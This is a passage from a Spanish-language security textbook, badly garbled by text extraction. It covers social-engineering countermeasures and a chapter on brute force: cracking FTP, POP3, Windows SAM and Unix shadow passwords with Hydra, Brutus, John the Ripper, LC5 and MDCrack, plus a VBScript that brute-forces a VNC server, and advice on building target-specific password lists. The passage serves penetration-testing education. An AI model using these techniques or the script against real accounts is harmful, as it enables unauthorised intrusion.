ingeniero social que tome a esa organización como objetivo, tarde o temprano consiga su fín y la comprometa. Lo más importante dentro de la organización es integrar a la gente que se desem-

 Actuación de ingenieros sociales Si deseamos conocer mejor la forma de actuar de un ingeniero social, hay que conocer a Patricio Peker. Es disertante acerca de la influencia y persuasión en las personas, y trata temas como los patrones mentales, estrategias para diálogos, objeciones, negociados. La dirección de su sitio es www.ganaropciones.com/peke www.ganaropciones.com/peker.htm r.htm y sus mp3 son muy interesantes.

104

 

peña en el sistema como parte del planeamiento estratégico de seguridad de la información y concientizarla periódicamente a partir del mismo reclutamiento.

 Área de riesgo

 Táctica intrusiva

Estrategia

 Teléfono (recepcionista)

Imp mpeers rson onaali liza zaci ción ón y  persuación

Entrene a sus empleados para que no den información confidencial ni passwords

Entr En trad adaa de edi difi fici cio o

Acceso físico no aut utor oriiza zado do

Pers Pe rson onal al de se segu guri rida dad d

Oficina

Mirar sobre el hombro

Vea si hay alguien presente

 Teléfono (mesa de ayuda) Imper. en llamadas ayuda

Utilice PINs

Oficina

Búsqueda de puertas a bi ert a s

Invitados y visitantes escoltados

Sala de correo

Inserción de memos

Cierre y monitoree

Sala de máquinas o teléfono de linea

Entrar, robar o plantar sniffer

Mantenga cerrado e inventariado

 Teléfono y PBX

Robar linea

Controle llamadas y  rechace transferencias

Cestos de basura

Extraer basura

Monitoree, borre de modo seguro y destruya lo descartado.

Intranet e internet

Plantar sniffers

Continuo revisiones de los cambios en la red y uso de los passwords

Oficina

Robar datos sensibles

Cierre y guarde todo.

General - Ps Psicológico

Impepersuación rsonalización y 

Entrene al personal periodicamente

Contramedidas.

Del documento Social Engineering Fundamentals, Part II: Combat Strategies de Sarah Granger. Granger. www.securityfocus.com www.securityfocus.com/infocus/1533 /infocus/1533 105

 

www.secunia.com

Espacio dedicado a informar diariamente sobre vulnerabilidades de sistemas y aplicaciones en formato advisory (aviso con detalles técnicos) vía e-mail a todo aquel que se dé de alta en el boletín. Contiene noticias, documentos técnicos (whitepapers) que describen fallas, blog, panel de trabajos y mucho más.

http://hwagm.elhacker.net

Sitio web acerca de seguridad sobre tecnología WiFi. Proveen un CD live con herramientas para auditar este tipo de sistemas (wifislax) y un foro especializado con gente dedicada al chequeo de redes inalámbricas que nos

106

 

4 > Fuerza  br  b rut uta a En este ca capí pít tul ulo o vere remo mos s cómo se ll lle eva a cabo ca bo es esta ta té técn cnic ica, a, co cono noci cida da en in ingl glés és co como mo Brut Br ute e Fo Forc rce. e. Co Cono noce cere remo mos s su sus s me meca cani nism smos os, , la las s herram her ramien ientas tas ut utili iliza zadas das, , los mod modos os, , des destin tinos os y ti tie emp mpos os, , las cla las ses de al algo gor rit itm mos po por r des esc cif ifr rar y los se ser rvi vici cio os en don ond de es posi po sibl ble e au audi dita tar r co con n el ella la ac acce ceso sos s vá váli lido dos s de del l tipo FTP, SSH, o POP3. Por otro lado, cono co noce cere remo mos s en de deta tall lle e la las s ca caus usas as qu que e inc nci ide den n en los tie iem mpo pos s de resu sult lta ado al aplicarla.

 

INTRODUCCIÓN A FUERZA BRUTA (FB) When in doubt, use brute force. Ken Thompson, Co-inventor de Unix. Fuerza bruta es una técnica que proviene originalmente de la criptografía, en especial del criptanálisis (el arte de romper códigos cifrados o descifrar textos). Es una manera de resolver problemas mediante un algoritmo simple de programación, que se encarga de generar y de ir probando las diferentes posibilidades hasta dar con el resultado resul tado esperado o de mejor conveniencia. conveniencia. Los casos de fuerza bruta que describiremos en este capítulo están orientados a la acción de generar claves (mediante la combinación secuencial de caracteres) y a probarlas en determinado servicio de autentificación o archivo para verificar si coinciden con un login válido de acceso (usuario y clave o sólo clave). Por otro lado, apuntan al proceso de romper el cifrado de archivos que contienen passwords de sistemas operativos o cuentas de usuario de otras aplicaciones. Como profesionales éticos, podemos utilizar esta técnica y sus herramientas para  verificar la vulnerabilidad de lo que debemos proteger y solucionarla.

Clicks. Una

forma ingeniosa de implementar un sistema de logueo funciona mediante una secuencia de clics en diferentes puntos visuales de una imagen. Este sistema (http://labs.mininova.org/passclicks/) 108

 

Empleos y orientación En seguridad informática, a veces es necesario llevar a cabo fuerza bruta para evitar el trabajo de probar a mano o generar combinaciones, algo que nos llevaría mucho tiempo de trabajo. Por ejemplo en estos siete casos: • Si necesitamos descubrir determinado usuario o password de un servicio de autentificación como FTP, SSH o POP3 de manera remota a través de una red. • Obtene Obtenerr el passwo password rd de archi archivos vos del paquete Office u otras aplicacion aplicaciones es del tipo compresores (.rar, .zip, .mdb, .xls, .doc) de modo local.

Office. Solicitud

de contraseña en base de datos de Access, que puede ser fácilmente crackeada o rota, como vulgarmente se dice, o descubierta por fuerza bruta.

• En el caso de formularios web de autentificación que solicitan que ingresemos

usuario usuar io y clave (validación (validación online, .htac .htaccess, cess, intranets intranets con logins) logins)..

Encr En crip ipta tar r no no, , ci cifr frar ar. . La palabra encriptar no se encuentra incluida en el  Diccionario de la Real Academia Española , ya que se trata de una deformación deformación del término inglés to encrypt. Aunque su uso está muy difundido, la palabra correcta es cifrar, que proviene de cifrado.

109

 

Weblogin. Solicitud de login (usuario y password) para ingresar en un repositorio

de políticas para la gestión de la seguridad de la información en el sitio Segu-info.

• Para romper romper los cifra cifrados dos típicos de los archi archivos vos shadow en Linux, Solaris y Unix, o los archivos hasheados SAM de la familia Windows. • Para descifrar strings de datos cifrados, como las claves almacenadas en md5 de los foros, o passwords como los que están presentes en routers Cisco. • Para calcular sesiones ID válidas de URLs en páginas de comercio electrónico u otro tipo de sitio web. • Para aplicar aplicar fuerza bruta a una aplica aplicación ción que cuenta con una inter interfaz faz gráfica (co-

mo aquellas que fueron desarrolladas en Visual Basic, Powercobol, VisualFox o Delphi, entre otros lenguajes ). Esto puede ser hecho tanto de manera local, con autentificación de usuario, o remotamente, utilizando un cliente para ese servicio (como Viewer de VNC por ejemplo) y haciendo que éste automatice su intento por lograr un login válido en el servidor.

Hasheado

El término hasheado se aplica en los casos en los que el password se encuentra oculto en algo llamado hash, que es un string más o menos así: f1a81d782dea3a19bdca383bffe68452. Luego de ser descifrado, quizás eso sea una clave del tipo c4r0l1n4.

110

 

Pipper.  Herramienta creada por Alberto Moro (Mandingo), muy útil para

realizar brute force sobre variables, cookies y credenciales o buscar CGIs, SQL injection y XSS, entre otros (www.yoire.com/downloads.php?tag=pipper).

Ejemplos didácticos

 Veamos unos ejemplos para comprender mejor la aplicación de esta técnica. Fuerza bruta aplicada a usuarios de servicios de autentificación remota.

Para realizar esto, utilizaremos la excelente herramienta Hydra sobre Linux y el  veterano  veteran o Brutu Brutuss (win32) sobre Window Windows. s. Hydra se puede descar descargar gar de free world.thc.or  world .thc.org/rel g/releases.p eases.php hp y, para ver ejempl ejemplos os de utiliza utilización, ción, hay que leer el archivo README. El sitio de Brutus es www.hoobie.net/brutus/, y los archivos de definición se encuentran en www.hoobie.net/brutus/brutus-application-definition-files.html. Para aprender a utilizarlo, podemos buscar la frase Manual Bru-

Enigma Nombre de una maquina que utilizaba un sistema rotatorio para el cifrado de mensajes alla por los años 30’. Tenia fama de ser inviolable y fue utilizada inicialmente por los milita mil itares res ale alema manes nes.. Los pol polaco acos s hic hicier ieron on ing ingeni enieri eria a inv invers ersa a sob sobre re una maq maquin uina a capturada a estos, para asi poder dar con la tecnica del desciframiento.

111

 

tus s enosGo Googl ogle. e.editadas Cabe Ca be ac acla lara rar r qu quee sla las s im imág ágen enes es qu que e ut util iliz izar arem emos os en nu nues estr tros os tu ejemplos ejempl están por razones razone de confidencial confid encialidad. idad. En el primer ejemplo que veremos, el objetivo es determinar qué password tiene el usuario ctori en un servidor FTP.

Hydra.  Aquí podemos ver cómo Hydra (ejecutado en una Shell y en su versión

visual HydraGTK) encontró el password desde una lista de palabras (Pass.txt).

Como segundo ejemplo, supongamos que deseamos chequear algunas cuentas de usuario válidas (comprobando usuario y password de cada una de ellas) en la organización objetivo (los datos de las cuentas fueron obtenidos mediante otras técnicas). Veamos cómo se vería esto en la aplicación Brutus.

The COD CODEBR EBREAK EAKERS ERS

Si les interesa la criptografia, un libro de lectura obligada es: The Codebreakers. The Compre Com prehen hensiv sive e His Histor toryy of Sec Secre rett Com Commun munica icatio tions ns fro from m Anc Ancien ientt Tim Times es to the Int Inter ernet net.. de David Khan. ISBN: 0684831309. Casi 1200 páginas muy interesantes acerca del tema.

112

 

1-

Objetivo, ya sea dirección IP o dominio. 2- Protocolo (POP3). 34-

Definir servidor proxy. Tiempos de espera de respuesta. 5- Modo de formato de login en la lista de palabras (en este caso, configurado configurado en modo combo usuar usuario:pa io:password ssword). ). 6- Muestra los accesos válidos en el sistema. 7- Muestra cuántos intentos hubo para dar con cada acceso válido. 8- Muestra el tiempo estimado para terminar la tarea. 9- Muestra los intentos en tiempo real. 10- Resuelve el dominio a IP. 11- Conexiones simultáneas de autentificación. 12- Puerto.

113

 

Fuerza bruta aplicada a cifrados Para es Para esto to,, ut util iliz izar arem emos os la he herra rrami mien enta ta Jo John hn th thee Ri Rippe pperr (w (www ww.o .ope penw nwal all.l.co comm/john/), el conocido LC5 (antiguamente de @stake y ahora de Symantec) y MDcrack, todas corriendo sobre Windows. Para saber cómo utilizar la primera, podemos ver el contenido de la carpeta doc de la instalación. Antes detallaremos básicamentee tres elementos por descif cament descifrar rar con estas aplic aplicacione aciones: s: •  SAM:   prov provie iene ne de pl plat ataf afor orma mass Wi Wind ndow owss y se en encu cuen entr traa en el di dire rect ctor orio io

C:\WINDOWS\system32\config. Contiene, entre otras cosas, las cuentas de usuarios con los passwords cifrados NTLM hash y LM hash. Un hash del archivo SAM luce así:  Administrador:500:5  Administra dor:500:5AC9FFFB9464FFA6B9136263703A79E8 AC9FFFB9464FFA6B9136263703A79E8:9E65AAFF0C32:9E65AAFF0C32CD68C624B442A07E369D:::. •  Shadow:  se encuentra en sistemas operativos como Linux, Solaris o Unix, y allí  residen reside n las cuenta cuentass de usuarios y sus passwords cifrados (basados, (basados, por lo general, en algoritmo DES, SHA-1 o MD5). Se ubica usualmente en /etc/shadow y luce de esta manera: lucio:/8o7907AjGrGw:11370:0:99999:7::: o homero:$1$9XSaYyhK$ZtVQCiSRf1mjgLvlCksZw0:12488:0:99999:7:::.

John. En

1 minuto y 26 segundos, con su algoritmo y el listado de palabras, descubrió el 

password de 126 cuentas. La primera fila es la de passwords en texto plano y la fila de la derecha (editada) son los usuarios.

•  String md5:  Es el almacenamiento en database de una contraseña como las de 114

 

administración y usuarios de un foro o del cifrado online de determinadas contraseñas que se utilizan en los Webmails como Yahoo y Hotmail. Luce de esta manera: a43dbaf5d2ea4ad642cb7f564260d905. Como tercer ejemplo, descifraremos las cuentas extraídas del archivo shadow Linux.

Los passwords deben estar en un archivo en texto plano, tipo lista, guardados con el password password.lst. Ingresand Ingresando >john users.txt , elelprogra programa primero prime utilizautili zará nombre su algoritmo para.lst. descubrir los ousuarios que tienen mismoma pass queroID, luego hará un intento híbrido y después utilizará las palabras que están en el pass word.lst una por una y combinándolas. Por último, realiza fuerza bruta generando palabras al azar para ver cuál coincide. Si se desea utilizar otro diccionario, hay que utilizar la sintaxis >john –-wordlist=diccionario.lst users.txt. En nuestro cuarto ejemplo, descifraremos las cuentas extraídas de un archivo SAM de Windows. LC5 es una buena alternativa si no se dispone de lo necesario para utilizar toda la capacidad de herramientas como   Ophcrack ,   Rainbowcrack   o Cain & Abel, basadas en la recuperación de passwords a través de  tablas rainbow  (más adelante veremos en detalle esta técnica con un claro ejemplo). Estas últimas precisan tablas precomputadas que pesan varios GB, muy utiles en el caso de necesitar descifrar passwords fuertes en poco tiempo.

Words.  Selección

de un diccionario de palabras en LC5 en la fase de configuración para proceder a recuperar passwords obtenidos desde hashes dumpeadas desde el archivo SAM de Windows XP.

115

 

 Aunque no iguala el rendimiento que logran aquellas herramientas herramientas que utilizan rainbow tables, LC5 es bastante eficaz eficaz en cuanto a comprobación, en especial desde dic-

cionarios de palabras. Se descarga de www.securitylab.ru/_tools/lc5setup.exe y, para conocer y aprender más sobre la forma de utilizarlo, basta con ir al menú Help/ Documentation. Como recomendación adicional, cabe mencionar que conviene eliminar elimi nar los hash que no deseamos desencriptar desencriptar como guest, los vacío vacíoss y otros, para así bajar considerablemente el tiempo de cómputo.

LC5. Aquí

vemos a LC5 recuperando contraseñas

desde los hashes. En esta pantalla, se observan algunas cuentas con sus respectivos passwords logrados en apenas minutos.

Hashes Has hes dum dumpea peadas das Hashes dumpeadas es un modismo (slang) del término inglés dump que significa volcar las cuentas (extraer) cifradas de sistema del archivo SAM desde un sistema Windows, ya sea a través de Pwdump, Fgdump (http://swamp.foofus.net/fizzgig/fgdump/) o herramienta similar.

116

 

El quinto ejemplo que veremos consiste en descifrar una cuenta de usuario administrador de foro que se encuentra cifrada en md5. En el caso de que hayamos dado con una clave de este tipo (por SQL injection en un foro o mediante la captura de tráfico con un sniffer), procederemos a utilizar MDCrack para descifrarlo.

Mdcrack. Aquí

se descif descifra ra el hash 46909 469098e537b 8e537b96e7e8 96e7e87e3196 7e3196b49a9 b49a9f299 f299

perteneciente al usuario administrador de un foro, con un charset (juego de caracteres) 0123456789, tardando tan sólo 12 segundos.

MDCrack se descarga de http://membres.lycos.fr/mdcrack/ y podemos conocer detalles sobre su uso leyendo el FAQ dentro del archivo. Los algoritmos que puede descifrar esta herra herramient mientaa son los sigui siguientes: entes:

Guarda Gua rdar r ses sesion iones es

Es recomendable guardar las sesiones para luego estudiarlas y, por otro lado, para que qu e no se nos pi pie erd rda a nad ada a de dell ou outp tpu ut de lo loss co com man ando doss en co cons nso ola (e (en n un du dum mpe peo o po porr ejemplo o al ver el contenido de un archivo). Promptpal (www. promptpal.com) y SecureCRT poseen logueo de sesión y algunas otras utilidades interesantes.

117

 

• Rsa MD2 MD4 MD5 • Rfc 2104 HMAC-MD4 HMAC-MD5 • FreeBSD MD5 • Apache MD5 • Microsoft NTLM1 • Cisco PIX Enable/User • Cisco IOS • Invision Power Board 2.x • IEEE CRC32 CRC32-B • Mark Adler ADLER32 • Generic MD4MD4: MD4(MD4(pass)) • Generic MD4MD4S: MD4(MD4(pass).salt) • Generi Genericc PHP: MD5(hex(MD5(pas MD5(hex(MD5(pass))) s))) • Generic PHPS: MD5(hex(MD5(pass)).salt)

Texto-plano.  www.plain-text.info es un sitio en donde

se descifran passwords mediante un mecanismo distribuido, empleando rainbow tables. El visitante puede adosar un hash y luego ver su resultado. Comprende los cifrados lm, md5, ntlm y doble md5.

 MD5

Para encontrar Crack string MD5 online, podemos visitar alguna de las siguientes direcciones: www.tmto.org (suele estar temporalmente offline, pero es la mejor que

existe), http:/ existe), http://gdata /gdataonlin online.com e.com/see /seekhash khash.php, .php, http: http://md5 //md5.theka .thekaine.d ine.de e o www.milw0rm.com/cracker/insert.php.

118

 

FB aplicada en archivos Office con clave Como sexto ejemplo, recuperaremos el password de un archivo con extensión del paquete Office o un archivo comprimido. Es normal que en ofimática (relacionado a informática de oficina) se utilicen passwords en archivos de Excel, Word, Access, Zip y Rar para proteger su contenido.

Rixler.  En

el sitio web de la empresa Rixler (www.rixler.com) podemos encontrar una aplicación llamada Word Password Recovery Master que, instantáneamente, puede descifrar el password de un documento Word (ya sea de write, open o protection).

 A este tipo de documen documentos, tos, se los suele encont encontrar rar en las intran intranets ets o termin terminales ales de las organizaciones, y la auditoría de este tipo de passwords suele tomar poco tiem-

Criptograf Cript ografía ía Asimé Asimétrica trica La criptografía asimétrica es el método criptográfico que utiliza PGP, se basa en dos llaves, una publica y otra privada. La primera puede darse a cualquiera mientras la otra debe ser mantenida en cuidado por el dueño.

119

 

po, debido a lo débil de su elección por parte del oficinista o ejecutivo. La herramienta para esto es  Passware Kit, y se puede descargar de   www.lostpassword.com/kit.htm . Para comprender su uso, hay que leer el Passware kit Help de la instalación.

Access.  Esta

herramienta recupera casi instantáneamente el password de un fichero .mdb

(database Access). Aquí vemos una de las pantallas de configuración.

FB aplicada a la interfaz gráfica Nuestro séptimo ejemplo consiste en descubrir el password de un servidor VNC a través de la interfaz gráfica de su cliente. En Internet se puede encontrar un simple script programado en VBScri VBScript, pt, que demues demuestra tra cómo es posible, mediante una aplicación visual (cliente), realizar brute force hacia el servidor, de manera local y, en este caso, con incidencia en el server remoto. El script en principio funcionaba con una versión anterior y en inglés de Radmin, un administrador remoto (www.sensepost.com/videostatic/vbs/vbs.html), pero 120

 

como es difícil conseguir la versión necesaria para testearlo, a continuación veremos el script modificado para que sirva con la última versión gratuita de VNC en es espa paño ñoll (V (VNC NC Fr Free ee Ed Edit itio ion n fo forr Wi Wind ndow owss Ve Vers rsio ion n 4. 4.1. 1.2, 2, qu quee po pode demo moss encontrar en www.realvnc.com/cgi-bin/download.cgi). ...8< ‘Quick ‘Qu ick and dir dirty ty .vb .vbs s bru brutef teforc orcer er ‘Ori ‘O rigi gina nal l fo for r Ra Radm dmin in by ha haro roon on at se sens nsep epos ost t ‘Ada ‘A dapt ptad ado o pa para ra VN VNC C en es espa paño ñol l po por r Ca Carl rlos os To Tori ri Dim Di m ob objF jFSO SO, , ob objT jTS, S, s, aF aFil ile e Set objFS objFSO O = Creat CreateObje eObject(“S ct(“Script cripting.F ing.FileSy ileSystemO stemObject bject”) ”) Set objTS = objFS objFSO.Ope O.OpenText nTextFile( File(“pala “palabras. bras.txt”) txt”) s = obj objTS. TS.Rea ReadAl dAll l ‘Now ‘N ow, , us use e sp spli lit t to lo load ad th the e co cont nten ents ts of th the e fi file le in into to a ar arra ray y aFile aFi le = spl split( it(s, s, vbC vbCrLf rLf) ) Msgbox Msg box “Na “Names mes Loa Loaded ded..” ..” set WshSh WshShell ell = Creat CreateObje eObject(“W ct(“WScrip Script.She t.Shell”) ll”) ‘Lau ‘L aunc nch h fr from om th the e co comm mman and d li line ne an and d wa wait it fo for r a se seco cond nd WshShell.Run “C:\Archiv~1\RealVNC “C:\Archiv~1\RealVNC\VNC4\vncviewer.exe” \VNC4\vncviewer.exe” WScript.Sl WScri pt.Sleep eep 1000

For Fo r Ea Each ch pa pass ss in aF aFil ile e while WshSh WshShell.A ell.AppAct ppActivate ivate(“VNC (“VNC Viewe Viewer”) r”) = FALSE wscript.sl wscri pt.sleep eep 1000 Wend

Crip Cr ipto togr graf afía ía de Cu Curv rva a El Elíp ípti tica ca Criptografía Criptografí a de Curva Elípt Elíptica ica (CCE) es una variante basada en las matemáticas matemáticas de las curvas cur vas el elipt iptica icass com como o alt alter ernat nativ iva a a la var varia iante nte de cr crip iptog tograf rafia ia asi asime metr trica ica.. Fue propuesta por Neal Koblitz y Victor Miller en 1985. -Fuente: Wikipedia-

121

 

‘Broin oing g the apl aplica icatio tion n to the for foregr egroun ound d ‘Br WshShell.A WshSh ell.AppAct ppActivate ivate “VNC Viewe Viewer” r” WScript.Sl WScri pt.Sleep eep 200 ‘Sen ‘S end d al altc tc, , t, ip ip, , en ente ter r WshShell.S WshSh ell.SendKe endKeys ys “%c” WScript.Sl WScri pt.Sleep eep 200 WshShell.S WshSh ell.SendKe endKeys ys “200. “200.000.0 000.000.00 00.000” 0”‘CAMB ‘CAMBIAR IAR ESTA IP WScript.Sl WScri pt.Sleep eep 200 WshShell.S WshSh ell.SendKe endKeys ys “{TAB “{TAB}” }” WScript.Sl WScri pt.Sleep eep 200 WshShell.SendKeys “{ENTER}” WScript.Sl WScri pt.Sleep eep 200 ‘Send ‘Se nd the pas passwo sword rd WshShell.S WshSh ell.SendKe endKeys ys pass WshShell.SendKeys “{ENTER}” WScript.Sl WScri pt.Sleep eep 300 if WshSh WshShell.A ell.AppAct ppActivate ivate(“200 (“200.000. .000.000. 000.000”) 000”) = True then Msgbox Msg box pas

wscript.quit End En d if Next ...8<

Uso de este script: si deseamos testearlo, podemos escribir este código tal cual está en un En editor de texto (Notepad o está Wordpad, por ejemplo) guardarlo como  vnc.vbs. el mismo lugar en donde ese archivo, debemosy tener guardado

Lista de correo

En est esta a pág página ina,, htt http:/ p://gr /group oups.g s.goog oogle. le.com com/gro /group/ up/sci sci.cr .crypt ypt se enc encuen uentra tra un gru grupo po de gente aficionada a los algoritmos y cifrados, como también mucho material acerca del tema.

122

 

el archivo palabras.txt con la lista de passwords que deseamos probar en el servidor VNC. Previamente hay que instalar VNC Viewer, reemplazar la IP del código por la IP del server VNC remoto y, por último, ejecutar ejecutar el script haciendo haciendo click sobre él. Les cuento que, en caso de acceder a un recurso remoto con este cliente, la IP de esa sesión quedará grabada en la siguiente clave de registro: HKEY_CURRENT_US RREN T_USER\S ER\Softw oftware\ are\Rea RealVNC lVNC\VNC \VNCView Viewer4\ er4\MRU. MRU. (Gra (Gracias cias a Haro Haroon on Meer y Charl van der Walt -SensePost Information Security- por su gentileza).

FACTORES QUE INCIDEN EN EL TIEMPO  Al utilizar aplicaciones de terceros o scripts programados por uno que intenta descifrar o acertar passwords, existe una serie de factores que pueden llevar a que éstos tarden demasiado tiempo o muy poco en lograr el objetivo. El tiempo es muy valioso en la seguridad informática, y una desconsideración que tenga incidencia en éste puede hacer que un atacante real, en lugar de tardar 2300 años en acertar un password mediante fuerza bruta o deducción analítica, lo haga

en un puñado de horas o en apenas minutos. Por la gran importancia de esto, entonces, en las próximas páginas conoceremos las diez principales variables que inciden en el tiempo de lograr un resultado satisfactorio o el más conveniente. 1.   La clave por descifrar descifrar es fuerte fuerte o lo es su cifrado, debido a la complejidad que dará el número de caracteres y la combinación o entropía (término de la física que significa desorden) de éstos, ya sean letras, números, mayúsculas, caracteres especiales y distintos símbolos. Una clave como ésta complica demasiado la técnica de brute force. Antes de gastar días, meses o años, es posible que se tarde menos en blanquear ese password, sniffearlo, lograr un usuario de un mismo nivel de privilegio en el sistema o hacer llegar ese login (reestablecido) hacia una casilla de email. 2.   Charset elegido: El charset es un juego de caracteres (character set) que puede ser 0123456789, abcdefghijkl...z o mayúsculas; existe también el charset de

 Momentos de ataque El momento en el que los servidores más reciben Brute Force de modo remoto es el fin de semana. ¿Por qué? Por un lado, el intruso del tipo script kiddie está libre porque no tiene clases y, por otro lado, el intruso experimentado sabe que el administrador, en la mayoría de las empresas chicas y medianas, vuelve recién el lunes por la mañana. 123

 

caracteres especiales. El charset ligado al trabajo de brute force puede ser uno de estos rangos, la combinación de ellos, su totalidad o sólo algunos caracteres se leccionados. Si se ataca un password cifrado de sólo números con un charset de muchos caracteres, la combinación de éstos será muchísimo más elevada que si se elige sólo el charset de números. Otro motivo por el que debemos conocer el sis tema es que, por ejemplo, si la aplicación aclara en su sitio introduzca su clave de 4 dígitos, ¿para qué darle brute force a su password cifrado (en caso de que lo ha yamos obtenido) o servicio con un charset completo? Con sólo intentar el charset de números, en pocos segundos lo descifrará.

Caracteres.  Sitio

de Juan Aqueveque, con interesantes notas acerca de los caracteres y estándares relacionados que utilizamos a diario. www.juque.cl/  weblog/2006/01/25/ascii-unicode-utf8-y-la-iatar weblog/2006/01/25/ascii-u nicode-utf8-y-la-iatarnaaianalizaaiannaaianalizaaian-parte-i.html. parte-i.html.

Códi Có digo go aj ajen eno o Recordemos que siempre es conveniente leer código ajeno, analizar sobre por qué se escribió así e interpretarlo. También es bueno portarlo a otras cosas y a otros lenguajes y, en lo posible, depurarlo o mejorarlo. Colaborar en proyectos Open Source es bueno, ya que de ese modo se aprende mucho en poco tiempo. No dudemos en pedir ayuda a otros.

124

 

3.   Utilización de diccionarios diccionarios de palabras: El empleo de éstos contra archivos de cuentas cifradas a través de un diccionario de palabras predefinidas da muy  buenos resultados, especialmente si el diccionario está confeccionado de manera inteligente. Veamos las clases de palabras que debería tener, con ejemplos de passwords entre paréntesis. • Todas las palabras del diccionario español e inglés. • Números del cero hasta N.

• Passwords por defecto (admin). • Passwords comúnmente utilizados (qwerty, 123456). • Nombr Nombres es (romi (romina, na, leonel) y diminu diminutivos tivos (rominita). (rominita). • Palabras del slang o lunfardo regional (copado, chabón). • Oficios y trabajos (arquitecta, ingeniera, gerente, operadores). • Fechas en formato ddmmaaaa o ddmmaa (desde el año 1900 a hoy, por cumpleaños y aniversarios). • Passwords extraídos de otras bases de datos. La aplicación que sea la encargada de la comprobación generará un hash de cada una de las palabras y la comparará con la existente por descifrar. Si coincide, la dará como matcheada (coincidencia) y la reportará como un resultado válido. Este método no es utilizado en aquellas que ya tengan tablas precomputadas, como Ophcrack. 4.   Téc Técnica nica de brute force en modo híbrido: híbrido:  Es similar a la utilización del diccionario, pero combinando cada palabra con algunos caracteres al final o delante de cada una de esas palabras allí contenidas. Por ejemplo, en el diccionario está la palabra marciano, entonces el script o programa intentará: marciano6, marciano7, marciano8, etcétera. Los caracteres que pone al final de cada palabra estarán definidos por nosotros en su configuración, cantidad y tipo de charset.  También se pueden unir dos palabras de un mismo diccionario, diccionario, como por ejemplo, marcianoa marcianoamarill marillo, o, marcianov marcianoverde, erde, marcianol marcianolila, ila, marcia marcianoblanco, noblanco, etcéter etcétera. a.

Logi Lo gin n on onli line ne En las páginas con login, algunas aplicaciones devuelven un mensaje de error del tipo Usuario inexistente. Eso invita a descubrir usuarios del sistema, ya que cuando acertemos un usuario que existe no recibiremos ese aviso y conoceremos así su existencia. Es un grave error, y es mejor implementar el mensaje: Combinación incorrecta.

125

 

Brute e forc force e seg según ún patr patrón, ón, passwords passwords generados generados a mano según objetivo: objetivo: 5.   Brut Esta técnica, combinada con los datos extraídos mediante information gathering  e ingeniería social, suelen dar frutos rápido. Se basa pura y exclusivamente en delinear una serie de palabras o de passwords sobre la base del conocimiento pre-

 vio que tenemos de la organizaci organización ón u objetivo. A los tipos de passwords nombrados para agregar en los diccionarios, tendríamos que adicionarles las siguientes: • Número de DNI (00000000). • Equipo de deporte favorito (riverplate, boca, pumas, leonas). • Bandas de música favoritas (sodastereo, divididos, miranda). • Títulos de libros favoritos (zaratustra, yoclaudio, elalquimista). • Letras de libros o segmentos (invisiblealosojos). • Títulos de canciones (blackbird, michelle, teparatres). • Letras de canciones o segmentos. • Nombres propios, de parientes o seres queridos: padres, hermanos, abuelo, abuela, bisabuelos, esposas, amantes, parejas, hijo, sobrinos, novias, ahijados y  nietos (jorge, martin, hugo, elvira, apolonio, susana, lorena, maria, gustavo, lucas, natalia, jezabel, jeremias) apodos de éstos también: (negra, mona, tato, puchi, loli, charly, titina, pupi, tito, pipi, manguera, pepe, pipo, pichi, colo). • Nombre de mascotas (tobby, atila, chunchuna, mora, negrita). • Nombres de barrios. • Número de asociado a alguna entidad. • Números de la suerte. • Nombre del ISP, organización, institución o universidad, del objetivo. • Cosas relacionadas con sus estudios, hobby o trabajo. • Ídolos favoritos musicales, reales, ficticios o históricos (lennon, messi, pokemon, napoleon). • Todo aquel otro gusto o preferencia que se le conozca a la persona, como marcas de ropa, de auto, de perfume, etcétera. • Todos los anteriores anteriores seguidos de númer números os en modo híbrido. • Passwords históricos históricos de éste o los que utili utilice ce en otro lugar.  Máquina ¿Qué haríamos si tuviésemos una máquina exclusivamente para romper cifrados que probara 90 mil millones de keys DES por segundo? Con semejante cantidad, se podría descifrar cualquier /etc/shadow completo en menos de cinco días. Podemos leer información sobre esto en www. cryptography.com/resources/whitepapers/DES-photos.html.

126

 

6.   Intent Intentar ar probar usuarios usuarios y passwords, ambos ambos por azar y de manera remota a servicios de autentificación: esto es una total pérdida de tiempo y es el método que más engorda logs de servidores (archivos de registros que contienen los intentos fallidos contra el servidor) cuando no se tiene noción de la técnica BF y  se trata de aplicar a servicios online. Las combinaciones de esta clase son infinitas e inútiles. Hay dos casos, pero ya no son de user y pass al azar, que es cuando disponemos de un objetivo en determinado rango que, posiblemente, contenga usuarios y passwords por defecto de fábrica o bien si nos disponemos a comprobar en una base de datos cuáles combinaciones son aún válidas en determinado ser vidor, de modo que se probaría en este formato: • user1:supasswordhistorico • user2:supasswordhistorico • user3:supasswordhistorico Es decir, cada usuario con su respectivo password que en algún momento fue  válido o aún lo es. La forma lógica de utilizar brute force de manera remota es conociendo al usuario de sistema (viendo de antemano el archivo /etc/passwd a través de un error de programación de la página o a través de Google como usuario de correo, al dejar su e-mail escrito por allí, por dar dos ejemplos simples).

Default.  Es

muy útil buscar listas actualizadas de claves por defecto. www.phenoelit-us.org/dpl/dpl.html 

7.   Ancho de banda: banda:  Existe una gran diferencia entre hacer brute force sobre un

Fuer Fu erza za br brut uta a

Fuerza bruta no es la mejor técnica, pero a veces es necesaria. Utilizada de manera lógica, puede llegar a ahorrar mucho tiempo. No debemos esperar resultados frente al monitor, es mejor dedicar una máquina a ello y usar otra terminal, o dejarla trabajando cuando estamos fuera o durmiendo. Así, la PC estará con todo el poder del micro dedicado a ello.

127

 

servicio online conectado servicio conectado desde de un teléfono (dial up) y en hacerlo desde una shell que posee la velocidad de un caño de varios megas de transferencia por segundo. Por eso, un intruso ( malicious malicious people  como las cataloga Secunia en su Weekly Summary) suele hacerlo desde una shell o servidor muy potente que cuenta con gran velocidad para la transmisión de datos. microprocesador dor en la técnica de fuerza bruta: bruta:  La importancia del mi8.   El microprocesa cro es fundamental por su potencia debido a la cantidad de cálculos por segundo que éste será capaz de realizar. Una tabla muy interesante sobre este tipo de procesamiento existe en la página de MDCrack. Por ejemplo, una máquina con  Windows XP Pro y micro 2x XEON 3.2GHz (DC + HT) realiza 42.299.451 comprobacio compr obaciones nes por segundo para descifrar un hash md5, contr contraa las 5.080.455 5.080.455 que hace una máquina con Windows XP y un micro Athlon 1.53 Ghz. 9.   La herramienta herramienta utilizad utilizada a en sí:  Su algoritmo y funcionamiento (no comparar LC5 con Ophcrack, por dar un ejemplo), el manejo de sockets, los tiempos de respuesta, entre otras tantas cosas. La programación por parte del pentester, en el

